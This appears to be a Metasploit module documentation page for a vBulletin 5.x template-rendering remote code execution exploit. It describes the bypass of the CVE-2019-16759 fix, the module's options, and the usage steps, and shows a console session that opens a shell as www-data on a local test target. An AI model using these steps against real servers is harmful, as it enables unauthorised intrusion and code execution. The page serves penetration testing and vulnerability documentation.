adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/exploit/multi/http/vbulletin_widget_template_rce.md
T
cgranleese-r7 469f102596 Updates docs to reflect new default prompt
2025-07-17 09:53:40 +01:00

2.2 KiB
Raw Blame History

Vulnerable Application

vBulletin A popular PHP bulletin board and blog web application. This module has been tested successfully against vBulletin 5.6.2 running on Ubuntu Linux 19.04.

Description

This module exploits a logic bug within the template rendering code of vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument which causes the former template to load the latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.

Verification Steps

  1. Do: use exploit/multi/http/vbulletin_widget_template_rce
  2. Do: set RHOSTS [IP]
  3. Do: set VHOST [HOSTNAME]
  4. Do: set LHOST [IP]
  5. Do: set TARGETURI [PATH]
  6. Do: set PAYLOAD [PAYLOADNUM]
  7. Do: run

Options

TARGETURI

The base URI path of vBulletin. Default: /

PHP_CMD

The PHP function to use to execute commands on the target. Default: shell_exec

Scenarios

msf > use exploit/multi/http/vbulletin_widget_template_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf exploit(multi/http/vbulletin_widget_template_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/vbulletin_widget_template_rce) > set VHOST vb.local
VHOST => vb.local
msf exploit(multi/http/vbulletin_widget_template_rce) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(multi/http/vbulletin_widget_template_rce) > set TARGETURI /
TARGETURI => /
msf exploit(multi/http/vbulletin_widget_template_rce) > set PAYLOAD 5
msf exploit(multi/http/vbulletin_widget_template_rce) > run

[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending php/bind_perl command payload
[*] Started bind TCP handler against 127.0.0.1:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 127.0.0.1:4444) at 2020-08-09 06:29:57 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reference in New Issue View Git Blame Copy Permalink